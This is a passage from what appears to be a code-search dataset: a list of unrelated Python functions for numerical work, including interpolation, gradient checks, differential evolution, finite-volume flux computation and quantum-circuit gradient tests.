for i in timeiters)\n assert len(efunc.parameters) == 4 + len(functions) + len(timeiters)\n\n # Check the loop nest structure\n trees = retrieve_iteration_tree(efunc)\n assert len(trees) == 1\n tree = trees[0]\n assert all(i.dim.name == j for i, j in zip(tree, nest))\n\n assert efunc.make_call()", "def eval_func(individual):\n \n tiled = np.tile(individual, (tile_factor, tile_factor))\n return calculate_force_on_sample(tiled, lam_frac_=lambda_factor)", "def FindGrid(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def _evaluate(self, x, y, z):\n if _isscalar(x):\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n beta = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha) * (1 - beta) * self.xInterpolators[y_pos - 1][z_pos - 1](x)\n + (1 - alpha) * beta * self.xInterpolators[y_pos - 1][z_pos](x)\n + alpha * (1 - beta) * self.xInterpolators[y_pos][z_pos - 1](x)\n + alpha * beta * self.xInterpolators[y_pos][z_pos](x)\n )\n else:\n m = len(x)\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.y_n):\n for j in range(1, self.z_n):\n c = np.logical_and(i == y_pos, j == z_pos)\n if np.any(c):\n alpha = (y[c] - self.y_list[i - 1]) / (\n self.y_list[i] - self.y_list[i - 1]\n )\n beta = (z[c] - self.z_list[j - 1]) / (\n self.z_list[j] - self.z_list[j - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * self.xInterpolators[i - 1][j - 1](x[c])\n + (1 - alpha) * beta * self.xInterpolators[i - 1][j](x[c])\n + alpha * (1 - beta) * self.xInterpolators[i][j - 1](x[c])\n + alpha * beta * self.xInterpolators[i][j](x[c])\n )\n return f", "def compute_eigvals(*params, **hyperparams):\n phi = params[0]\n d, t = hyperparams[\"dimension\"]\n\n if qml.math.get_interface(phi) == \"tensorflow\":\n phase = qml.math.exp(1j * qml.math.cast_like(phi, 1j))\n minus_phase = qml.math.exp(-1j * qml.math.cast_like(phi, 1j))\n return stack_last([phase if index < d else minus_phase for index in range(t)])\n\n arg = 1j * phi\n prefactors = qml.math.array([1 if index < d else -1 for index in range(t)], like=phi)\n\n if qml.math.ndim(phi) == 0:\n product = arg * prefactors\n else:\n product = qml.math.outer(arg, prefactors)\n return qml.math.exp(product)", "def EvaluateGradient(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def grad_of_evaluate(\n self,\n targets: Optional[jnp.ndarray],\n coefficient_mode: str,\n ) -> Sequence[jnp.ndarray]:\n def evaluate_sum(inputs: Sequence[jnp.ndarray]) -> jnp.ndarray:\n instance = self.copy_with_different_inputs(inputs)\n return jnp.sum(instance.evaluate(targets, coefficient_mode))\n return jax.grad(evaluate_sum)(self.inputs)", "def compute_hessian_vector_product(self, function, arguments):", "def calc(self):\n\t\tfor neuron in self.neurons.items():\n\t\t\tneuron.calculate()", "def efSolver(self):\n dx = self.dh[0] # dx\n dy = self.dh[1] # dy\n dz = self.dh[2] # dz\n \n for i in np.arange(0, self.ni):\n for j in np.arange(0, self.nj):\n for k in np.arange(0, self.nk):\n\n #x-component#\n if i==0: \n # forward\n self.ef[i][j][k][0] = -(-3*self.phi[i][j][k]+\\\n 4*self.phi[i+1][j][k]-\\\n self.phi[i+2][j][k])/(2*dx)\n elif i==self.ni-1: \n # backward\n self.ef[i][j][k][0] = -(self.phi[i-2][j][k]-\\\n 4*self.phi[i-1][j][k]+\\\n 3*self.phi[i][j][k])/(2*dx)\n else: \n #central\n self.ef[i][j][k][0] = -(self.phi[i+1][j][k] - \\\n self.phi[i-1][j][k])/(2*dx)\n\n #y-component\n if j==0:\n self.ef[i][j][k][1] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j+1][k]-\\\n self.phi[i][j+2][k])/(2*dy)\n elif j==self.nj-1:\n self.ef[i][j][k][1] = -(self.phi[i][j-2][k] - \\\n 4*self.phi[i][j-1][k] +\\\n 3*self.phi[i][j][k])/(2*dy)\n else:\n self.ef[i][j][k][1] = -(self.phi[i][j+1][k] - \\\n self.phi[i][j-1][k])/(2*dy)\n\n #z-component\n if k==0:\n self.ef[i][j][k][2] = -(-3*self.phi[i][j][k] + \\\n 4*self.phi[i][j][k+1]-\n self.phi[i][j][k+2])/(2*dz)\n elif k==self.nk-1:\n self.ef[i][j][k][2] = -(self.phi[i][j][k-2] - \\\n 4*self.phi[i][j][k-1] + \\\n 3*self.phi[i][j][k])/(2*dz)\n else:\n self.ef[i][j][k][2] = -(self.phi[i][j][k+1] - \\\n self.phi[i][j][k-1])/(2*dz)", "def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)", "def __call__(self, x_eval, X_far, X_near, inner_product_far=None):\n\n b = self._compute_b(x_eval, X_far, X_near)\n A = self._compute_A(X_far, X_near)\n Q = self._compute_Q(X_far, X_near, inner_product_far, A)\n\n lamda = self._qp_solver(Q, b)\n\n if np.all(Q @ lamda + b + self._feasibility_eps >= 0):\n return A.T @ lamda\n else:\n None", "def eval_numerical_gradient_array(f, x, df, h=1e-5):\n grad = np.zeros_like(x)\n it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])\n while not it.finished:\n ix = it.multi_index\n\n oldval = x[ix]\n x[ix] = oldval + h\n pos = f(x).copy()\n x[ix] = oldval - h\n neg = f(x).copy()\n x[ix] = oldval\n\n grad[ix] = np.sum((pos - neg) * df) / (2 * h)\n it.iternext()\n return grad", "def compute(self, *args):\n return _ITKCostFunctionsPython.itkMultipleValuedVnlCostFunctionAdaptor_compute(self, *args)", "def _evaluate(self, x, y):\n x_pos, y_pos = self.find_sector(x, y)\n alpha, beta = self.find_coords(x, y, x_pos, y_pos)\n\n # Calculate the function at each point using bilinear interpolation\n f = (\n (1 - alpha) * (1 - beta) * self.f_values[x_pos, y_pos]\n + (1 - alpha) * beta * self.f_values[x_pos, y_pos + 1]\n + alpha * (1 - beta) * self.f_values[x_pos + 1, y_pos]\n + alpha * beta * self.f_values[x_pos + 1, y_pos + 1]\n )\n return f", "def grad_f(self, x, y, z):\n\n str_dfdx = (\"maT * (x-mxT)\"\n \"* exp(-((x-mxT)**2+(y-myT)**2+(z-mzT)**2)/(2*msT**2))\"\n \"/ (msT**2)\")\n dfdx = ne.evaluate(str_dfdx,\n local_dict={'x': x,\n 'y': y,\n 'z': z,\n 'mxT': self.mxT,\n 'myT': self.myT,\n 'mzT': self.mzT,\n 'msT': self.msT,\n 'maT': self.maT})\n str_dfdy = (\"maT * (y-myT)\"\n \"* exp(-((x-mxT)**2+(y-myT)**2+(z-mzT)**2)/(2*msT**2))\"\n \"/ (msT**2)\")\n dfdy = ne.evaluate(str_dfdy,\n local_dict={'x': x,\n 'y': y,\n 'z': z,\n 'mxT': self.mxT,\n 'myT': self.myT,\n 'mzT': self.mzT,\n 'msT': self.msT,\n 'maT': self.maT})\n str_dfdz = (\"maT * (z-mzT)\"\n \"* exp(-((x-mxT)**2+(y-myT)**2+(z-mzT)**2)/(2*msT**2))\"\n \"/ (msT**2)\")\n dfdz = ne.evaluate(str_dfdz,\n local_dict={'x': x,\n 'y': y,\n 'z': z,\n 'mxT': self.mxT,\n 'myT': self.myT,\n 'mzT': self.mzT,\n 'msT': self.msT,\n 'maT': self.maT})\n\n dfdx_sum = np.sum(dfdx, axis=0)\n dfdy_sum = np.sum(dfdy, axis=0)\n dfdz_sum = np.sum(dfdz, axis=0)\n\n return dfdx_sum, dfdy_sum, dfdz_sum", "def evaluationFunction(problem, gFunc, hFunc, node):\n #g = getattr(searchAgents, gFunc)\n #h = getattr(searchAgents, hFunc)\n h = hFunc\n #return g(node) + h(node)\n return gFunc + h(node, problem)", "def test_incorrect_gradients_on_execution(self):\n a = jax.numpy.array([0.1, 0.2])\n\n dev = qml.device(\"default.qubit\", wires=1)\n\n def cost(a, device):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return execute(\n [tape],\n device,\n gradient_fn=param_shift,\n grad_on_execution=True,\n )[0]\n\n with pytest.raises(\n ValueError, match=\"Gradient transforms cannot be used with grad_on_execution=True\"\n ):\n jax.grad(cost)(a, device=dev)", "def _evaluate(self, w, x, y, z):\n if _isscalar(w):\n x_pos = max(min(np.searchsorted(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos - 1](w)\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos](w)\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos][z_pos - 1](w)\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos][z_pos](w)\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos - 1][z_pos - 1](w)\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos][y_pos - 1][z_pos](w)\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos][z_pos - 1](w)\n + alpha * beta * gamma * self.wInterpolators[x_pos][y_pos][z_pos](w)\n )\n else:\n m = len(x)\n x_pos = np.searchsorted(self.x_list, x)\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.x_n):\n for j in range(1, self.y_n):\n for k in range(1, self.z_n):\n c = np.logical_and(\n np.logical_and(i == x_pos, j == y_pos), k == z_pos\n )\n if np.any(c):\n alpha = (x[c] - self.x_list[i - 1]) / (\n self.x_list[i] - self.x_list[i - 1]\n )\n beta = (y[c] - self.y_list[j - 1]) / (\n self.y_list[j] - self.y_list[j - 1]\n )\n gamma = (z[c] - self.z_list[k - 1]) / (\n self.z_list[k] - self.z_list[k - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i - 1][j - 1][k - 1](w[c])\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[i - 1][j - 1][k](w[c])\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[i - 1][j][k - 1](w[c])\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[i - 1][j][k](w[c])\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i][j - 1][k - 1](w[c])\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[i][j - 1][k](w[c])\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[i][j][k - 1](w[c])\n + alpha\n * beta\n * gamma\n * self.wInterpolators[i][j][k](w[c])\n )\n return f", "def eval_numerical_gradient_array(f, x, df, h = 1e-5):\n grad = np.zeros_like(x)\n it = np.nditer(x, flags = ['multi_index'], op_flags =['readwrite'])\n while not it.finished:\n ix = it.multi_index\n \n oldval = x[ix]\n x[ix] = oldval + h\n pos = f(x).copy()\n x[ix] = oldval - h\n neg = f(x).copy()\n x[ix] = oldval\n \n grad[ix] = np.sum((pos - neg) * df) / (2 * h)\n it.iternext()\n return grad", "def build_eval(self, inputs):\n def evaluate_hessian(x):\n return self.Hx(inputs, x) + self.reg_coeff * x\n\n return evaluate_hessian", "def evaluate_(self, inputs):\n log_wks = []\n count = None\n N = self.config['eval_N']\n L = self.config['eval_repeats']\n\n for _ in xrange(N):\n log_wk, count = self.explore_(inputs, L)\n log_wks.append(log_wk)\n\n log_wk = np.concatenate(log_wks, axis=1)\n log_wk_sum = logSumExp(log_wk, axis=1, status='numpy')\n\n nll = np.mean(-(log_wk_sum - np.log(N * L)))\n perplexity = np.exp(np.mean(-(log_wk_sum - np.log(N * L)) / count))\n\n return nll, perplexity", "def __call__ ( self , x , *args ) :\n #\n ## 1) evaluate the function \n val = self.func_eval ( x , *args )\n #\n ## no uncertainties? \n if isinstance ( x , num_types ) : return VE ( val , 0 )\n # ignore small or invalid uncertanties \n elif 0 >= x.cov2() or iszero ( x.cov2() ) : return VE ( val , 0 )\n #\n ## 2) evaluate the derivative\n dfun = self.__derivative\n d = dfun ( float ( x ) , *args ) \n ## 3) calculate the variance \n cov2 = d * d * x.cov2()\n ## 4) get a final result \n return VE ( val , cov2 )", "def DE(fun,\n run_info,\n dimension,\n max_evals,\n name_output=None,\n run=25,\n replace=True,\n debug=True,\n F=0.6,\n CR=0.9,\n popsize=60,\n crossoverFunction=DEcrossover.classicalBinFunction,\n population=None,\n initial_solution=None):\n assert isinstance(dimension, int), 'dimension should be integer'\n assert (dimension > 0), 'dimension must be positive'\n\n for attr in ['lower', 'upper', 'threshold', 'best']:\n assert attr in run_info.keys(\n ), \"'{}' info not provided for benchmark\".format(attr)\n\n # Added in a array the max evaluations\n if not isinstance(max_evals, list):\n max_evals = [max_evals]\n\n lower = run_info['lower']\n upper = run_info['upper']\n threshold = run_info['threshold']\n fun_best = run_info['best']\n\n PS = popsize\n\n normal_values = {'F': (0.5, 0.3), 'CR': (0.9, 0.1)}\n\n maxEval = max_evals[-1]\n\n if name_output is None:\n fid = None\n else:\n # if it replaced it only return the last value\n if not replace and os.path.isfile(name_output):\n fin = open(name_output, 'rb')\n lines = fin.readlines()\n\n if lines:\n (bestSolutionFitness, bestSol, bestEval,\n evaluations) = lines[-1].split(',')\n return EAresult(\n fitness=bestSolutionFitness,\n solution=bestSol,\n evaluations=evaluations)\n\n fid = open(name_output, 'w')\n\n if isinstance(crossoverFunction, types.FunctionType):\n crossover = DEcrossover.SimpleCrossover(crossoverFunction)\n else:\n crossover = crossoverFunction\n\n currentEval = 0\n bestSolutionFitness = np.Inf\n\n for numrun in range(1, run + 1):\n check_evals = max_evals[:]\n check_eval = check_evals.pop(0)\n valueMutation = get_parameter('F', F, normal_values['F'], PS)\n probabilityRecombination = get_parameter('CR', CR, normal_values['CR'],\n PS)\n\n bestSolution = np.zeros(dimension)\n bestSolutionFitness = np.Inf\n numEvalFound = 0\n sizePopulation = PS\n crossover.initrun(numrun, (lower, upper), maxEval, PS)\n\n currentEval = 0\n\n # Start generating the initial population\n i = 0\n indexBest = 0\n\n if population is not None:\n sizePopulation = population.shape[0]\n else:\n population = np.zeros((sizePopulation, dimension))\n\n for i in range(sizePopulation):\n population[i, :] = np.random.uniform(lower, upper, dimension)\n\n if initial_solution is not None:\n population[0, :] = initial_solution\n\n populationFitness = np.zeros(sizePopulation)\n\n for i in range(sizePopulation):\n populationFitness[i] = fun(population[i, :])\n currentEval += 1\n\n if bestSolutionFitness > populationFitness[i]:\n bestSolutionFitness = populationFitness[i]\n\n bestSolution[:] = population[i, :]\n\n indexBest = i\n numEvalFound = currentEval\n\n msg = \"Best solution Find: %e at %d\" % (bestSolutionFitness,\n currentEval)\n dprint(msg, debug)\n\n while not shouldEnd(currentEval, maxEval, bestSolutionFitness,\n fun_best, threshold):\n # Mutate the current population\n trialVector = np.zeros((sizePopulation, dimension))\n trialVectorFitness = np.zeros(sizePopulation)\n\n for i in range(sizePopulation):\n noisyVector = crossover.apply(population, i, indexBest,\n get_value(valueMutation))\n noisyVector = np.clip(noisyVector, lower, upper)\n\n # Obtain the next solution considering probabilityRecombination\n probability = get_value(probabilityRecombination)\n changed = (np.random.rand(dimension) < probability)\n trialVector[\n i] = noisyVector * changed + population[i] * np.invert(\n changed)\n trialVectorFitness[i] = fun(trialVector[i])\n currentEval += 1\n successful = trialVectorFitness[i] < populationFitness[i]\n improvement = populationFitness[i] - trialVectorFitness[i]\n crossover.set_previous_improvement(improvement)\n parameter_result(valueMutation, successful)\n parameter_result(probabilityRecombination, successful)\n\n if successful:\n population[i, :] = trialVector[i, :]\n populationFitness[i] = trialVectorFitness[i]\n\n if populationFitness[i] < bestSolutionFitness:\n\n bestSolution[:] = population[i, :]\n bestSolutionFitness = populationFitness[i]\n\n indexBest = i\n numEvalFound = currentEval\n position = currentEval - sizePopulation + indexBest\n dprint(\"Best solution Find: %e at %d\" %\n (bestSolutionFitness, position), debug)\n\n if fid is not None and currentEval >= check_eval:\n fid.write(\"[%.0e]: %e,%d\\n\" %\n (check_eval, abs(bestSolutionFitness - threshold),\n numEvalFound))\n fid.flush()\n\n if check_evals:\n check_eval = check_evals.pop(0)\n\n # Generation\n\n # Show the best solution ever\n msg = \"The best solution is: %e in %d evaluation %s\" % (\n bestSolutionFitness, numEvalFound, crossover.stats())\n\n dprint(msg, debug)\n\n if fid is not None:\n fid.write(\"%s\\n\" % msg)\n fid.write(\"%e,%s,%d,%d\\n\" % (abs(bestSolutionFitness - threshold),\n ' '.join(map(str, bestSolution)),\n numEvalFound, currentEval))\n fid.flush()\n\n if fid is not None:\n fid.close()\n\n return EAresult(\n fitness=bestSolutionFitness,\n solution=bestSolution,\n evaluations=currentEval)", "def __call__ ( self , args , cor = None ) :\n n = self.N \n assert len ( args ) == n , 'Invalid argument size'\n\n ## get value of the function \n val = self.func ( *args )\n \n c2 = 0\n \n x = n * [ 0 ] ## argument \n g = n * [ 0 ] ## gradient \n \n for i in range ( n ) :\n\n xi = VE ( args[i] )\n x [i] = x \n \n ci = xi.cov2()\n if ci < 0 or iszero ( ci ) : continue\n \n di = self.partial[i] ( *args )\n if iszero ( di ) : continue\n \n ei = xi.error() \n\n g [i] = di \n e [i] = ei\n \n ## diagonal correlation coefficients are assumed to be 1 and ignored! \n c2 += ci * di * di\n \n for j in range ( i ) : \n\n xj = x [ j ]\n cj = xj.cov2 () \n if cj < 0 or iszero ( cj ) : continue\n dj = d [ j ]\n if iszero ( dj ) : continue \n ej = e [ j ]\n\n rij = self.__corr ( cor , i , j ) if cor else 0 \n assert -1 <= rij <= 1 or isequal ( abs ( rij ) , 1 ) ,\\\n 'Invalid correlaation coefficient (%d,%d)=%s ' % ( i , j , rij )\n \n c2 += 2.0 * di * dj * rij * ei * ej \n \n return VE ( val , c2 )", "def solve(grid):\n values = grid_values(grid)\n \n values = search(values)\n\n return values", "def solve(grid):\n values = grid_values(grid)\n search(values)\n\n return values", "def eval_Dxy(self):\n\n return self.Xf - self.Yf", "def fCalc(self):\n # A dictionary composed of all internal and boundary points\n allPoints = dict(self.internalPoints.items() + self.boundaryPoints.items())\n\n for pointLabel in allPoints.keys():\n # Compute fE, fW, fN and fW only for internal mesh points\n if allPoints[pointLabel].type.lower() == 'internal':\n xLabel = pointLabel[0]\n yLabel = pointLabel[1]\n x = self.internalPoints[(xLabel,yLabel)].x\n y = self.internalPoints[(xLabel,yLabel)].y\n xE = allPoints[(xLabel + 1,yLabel)].x\n xW = allPoints[(xLabel - 1,yLabel)].x\n yN = allPoints[(xLabel,yLabel + 1)].y\n yS = allPoints[(xLabel,yLabel - 1)].y\n \n if (xE - x)/self.h < -0.000001 or (xE - x)/self.h > 1.000001:\n errorMessage = '**Error! (xE - x)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (xE - x)/h = ' + str((xE - x)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fE = (xE - x)/self.h\n\n # Note that in the following we use -0.000001 and 1.000001 \n # instead of 0 and 1, respectively, to avoid problems with\n # with very small fractions. For example if the fractions is\n # greater than one by 2.22e-16 the condition (x - xW)/self.h > 1\n # will be false and the code returns an error\n if (x - xW)/self.h < -0.000001 or (x - xW)/self.h > 1.000001:\n errorMessage = '**Error! (x - xW)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (x - xW)/h = ' + str((x - xW)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fW = (x - xW)/self.h\n \n if (yN - y)/self.h < -0.000001 or (yN - y)/self.h > 1.000001:\n errorMessage = '**Error! (yN - y)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (yN - y)/h = ' + str((yN - y)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fN = (yN - y)/self.h\n \n if (y - yS)/self.h < -0.000001 or (y - yS)/self.h > 1.000001:\n errorMessage = '**Error! (y - yS)/h for the point with label ('+str(xLabel) + ',' + str(yLabel) + ') and coordinate (' + str(x) + ',' + str(y) + ') is not between zero and one: (y - yS)/h = ' + str((y - yS)/self.h)\n raise customError(errorMessage)\n else:\n self.internalPoints[(xLabel,yLabel)].fS = (y - yS)/self.h\n \n # Calculate the coeeficients requried to compute the Laplacian \n self.internalPoints[(xLabel,yLabel)].LapCoeffCalc()", "def _evaluate(self, x, y):\n if _isscalar(x):\n f = self.compare([f(x, y) for f in self.functions])\n else:\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n f = self.compare(temp, axis=1)\n return f", "def eval(self, df):\n return self.ev(self.model, df)", "def grid_evaluation(param_list_one, param_list_two, param_eval, n_trials=16, \n aggr_method=np.mean, save_dir='data/', file_name='grid evaluation',\n save_to_disk=True, save_each=1000, chunksize=1.):\n \n \n if not list(param_list_two): # If `param_list_two` is empty\n params = param_list_one\n grid_shape = (len(param_list_one),)\n is_really_grid = False\n \n else:\n params = list(itertools.product(param_list_one, param_list_two))\n grid_shape = (len(param_list_one), len(param_list_two))\n is_really_grid = True\n \n def grid_fun(point): # Function to compute for each grid point\n \n trial_out = np.nan * np.ones((n_trials,))\n \n for i in np.arange(n_trials):\n \n if is_really_grid:\n trial_out[i] = param_eval(point[0], point[1])\n else: # If `param_list_two` is empty\n trial_out[i] = param_eval(point)\n \n return aggr_method(trial_out)\n \n n_grid_pts = len(params)\n \n # Recording procedure\n def record_experiment(grid):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n save_path = save_dir + now + ' ' + file_name + '.pkl'\n experiment = {\n 'date': now,\n 'rows': param_list_one,\n 'cols': param_list_two,\n 'n_trials': n_trials,\n 'grid': np.reshape(grid, grid_shape),\n 'path': save_path\n }\n if save_to_disk:\n utils.save_obj(experiment, save_path)\n return experiment\n \n # Set a pool of workers\n nb_workers = min(mp.cpu_count(), 24)\n print('Working with {} processes.'.format(nb_workers))\n pool = mp.Pool(nb_workers)\n \n # Iterate `grid_fun` across workers\n it = pool.imap(grid_fun, params, chunksize=chunksize)\n grid = np.nan * np.ones((n_grid_pts,))\n\n for idx, val in enumerate(tqdm(it, total=n_grid_pts)):\n grid[idx] = val\n \n # Make sure that we save after each couple of iterations\n if (idx >= save_each) and (idx % save_each == 0): \n experiment = record_experiment(grid)\n \n # Close pool\n pool.close()\n pool.join()\n \n experiment = record_experiment(grid)\n \n return experiment", "def grid_hessian(self, gridaxes):\n assert np.isscalar(self.dim), 'Hessian only implemented for scalar and vector functions'\n assert len(gridaxes) == self.sdim, \"Input has wrong dimension\"\n colloc = [collocation_derivs(self.kvs[i], gridaxes[i], derivs=2) for i in range(self.sdim)]\n\n d = self.sdim\n n_hess = ((d+1)*d) // 2 # number of components in symmetric part of Hessian\n N = tuple(len(g) for g in gridaxes) # shape of tensor grid\n\n # determine size of output array\n if self.dim == 1:\n out_shape = N + (n_hess,)\n else:\n out_shape = N + (self.dim, n_hess)\n hess = np.empty(out_shape, dtype=self.coeffs.dtype)\n\n i_hess = 0\n for i in reversed(range(self.sdim)): # x-component is the last one\n for j in reversed(range(i+1)):\n # compute vector of derivative indices\n D = self.sdim * [0]\n D[i] += 1\n D[j] += 1\n ops = [colloc[k][D[k]] for k in range(self.sdim)] # derivatives in directions i,j\n\n if self.dim == 1: # scalar function\n hess[..., i_hess] = apply_tprod(ops, self.coeffs) # D_i D_j (self)\n else: # vector function\n for k in range(self.dim):\n hess[..., k, i_hess] = apply_tprod(ops, self.coeffs[..., k]) # D_i D_j (self[k])\n i_hess += 1\n return hess # shape: shape(grid) x self.dim x n_hess", "def test_grad(self):\r\n for shp0, shp1 in [((1,), (2,)),\r\n ((3,), (1,)),\r\n ((1,), (1,)),\r\n ((3,), (2,)),\r\n ((3, 2), (1, 1)),\r\n ((3, 2), (1, 4)),\r\n ((3, 2), (4, 1)),\r\n ((3, 2), (4, 5)),\r\n ((1, 2), (4, 5)),\r\n ((3, 1), (4, 5)),\r\n ((1, 1), (4, 5)),\r\n ((1, 1), (1, 1)),\r\n ]:\r\n data0 = numpy.random.rand(*shp0).astype(floatX)\r\n data1 = numpy.random.rand(*shp1).astype(floatX)\r\n utt.verify_grad(tensor.outer, [data0, data1])", "def fvm(states: States, grid: Gridlines, topo: Topography, config: Config, runtime: DummyDict):\n # pylint: disable=invalid-name\n\n # calculate source term contributed from topography gradients\n states = topography_gradient(states, topo, config.params.gravity)\n\n # calculate slopes of piecewise linear approximation\n states = minmod_slope(states, grid, config.params.theta, runtime.tol)\n\n # interpolate to get discontinuous conservative quantities at cell faces\n states = get_discontinuous_cnsrv_q(states, grid)\n\n # fix non-physical negative depth\n states = correct_negative_depth(states, topo)\n\n # get non-conservative variables at cell faces\n states = decompose_variables(states, topo, runtime.epsilon)\n\n # get local speed at cell faces\n states = get_local_speed(states, config.params.gravity)\n\n # get discontinuous PDE flux at cell faces\n states = get_discontinuous_flux(states, topo, config.params.gravity)\n\n # get common/continuous numerical flux at cell faces\n states = central_scheme(states, runtime.tol)\n\n # get final right hand side\n states.rhs.w = \\\n (states.face.x.num_flux.w[:, :-1] - states.face.x.num_flux.w[:, 1:]) / grid.x.delta + \\\n (states.face.y.num_flux.w[:-1, :] - states.face.y.num_flux.w[1:, :]) / grid.y.delta + \\\n states.src.w\n\n states.rhs.hu = \\\n (states.face.x.num_flux.hu[:, :-1] - states.face.x.num_flux.hu[:, 1:]) / grid.x.delta + \\\n (states.face.y.num_flux.hu[:-1, :] - states.face.y.num_flux.hu[1:, :]) / grid.y.delta + \\\n states.src.hu\n\n states.rhs.hv = \\\n (states.face.x.num_flux.hv[:, :-1] - states.face.x.num_flux.hv[:, 1:]) / grid.x.delta + \\\n (states.face.y.num_flux.hv[:-1, :] - states.face.y.num_flux.hv[1:, :]) / grid.y.delta + \\\n states.src.hv\n\n # remove rounding errors\n states.rhs = remove_rounding_errors(states.rhs, runtime.tol)\n\n # obtain the maximum safe dt\n amax = nplike.max(nplike.maximum(states.face.x.plus.a, -states.face.x.minus.a))\n bmax = nplike.max(nplike.maximum(states.face.y.plus.a, -states.face.y.minus.a))\n max_dt = min(0.25*grid.x.delta/amax, 0.25*grid.y.delta/bmax)\n\n return states, max_dt", "def gradFun(self, S, x):", "def evaluate(self, eval_data, eval_labels, eval_input_fn):\n raise NotImplementedError(\"Method must be implemented by subclass\")", "def forward_2D_self_eval(self, grid_h, grid_w, pts_2, pts_ell, per_point=False, return_pdf=True):\n if isinstance(pts_2, torch.Tensor):\n pts_2 = [pts_2[i] for i in range(pts_2.shape[0])]\n\n ### number of points in each point cloud in the batch\n n_pts_2 = [None] * len(pts_2)\n ### preserve the x y dim\n for ib in range(len(pts_2)):\n pts_2[ib] = pts_2[ib][:, :2]\n n_pts_2[ib] = pts_2[ib].shape[0]\n\n ### construct ells (need to normalize to the number of points in each point cloud)\n pts_ells_2 = [None] * len(pts_2)\n for ib in range(len(pts_2)):\n sigma_x = torch.ones_like(pts_2[ib][:,0]) * pts_ell\n sigma_y = torch.ones_like(sigma_x) * pts_ell\n rho_xy = torch.zeros_like(sigma_x)\n weight = torch.ones_like(sigma_x) / n_pts_2[ib] # normalize\n pts_ells_2[ib] = torch.stack([sigma_x, sigma_y, rho_xy, weight], dim=0) # 4*N\n \n ### construct uvb for pts_2\n pts_uvb_2 = []\n for ib in range(len(pts_2)):\n pts_uv_2_ib = pts_2[ib].round().to(dtype=int)\n pts_uvb_2_ib = torch.cat([pts_uv_2_ib, torch.ones_like(pts_uv_2_ib[:,[0]])*ib], dim=1) # N*3 \n pts_uvb_2.append(pts_uvb_2_ib)\n pts_uvb_cat_2 = torch.cat(pts_uvb_2, dim=0) # BigN * 3\n pts_uvb_cat_2_split = torch.split(pts_uvb_cat_2, 1, 1)\n pts_uvb_cat_2 = pts_uvb_cat_2.transpose(0,1).unsqueeze(0) # 1*3*N\n\n ### flattening pts_2\n pts_cat_2 = torch.cat(pts_2, 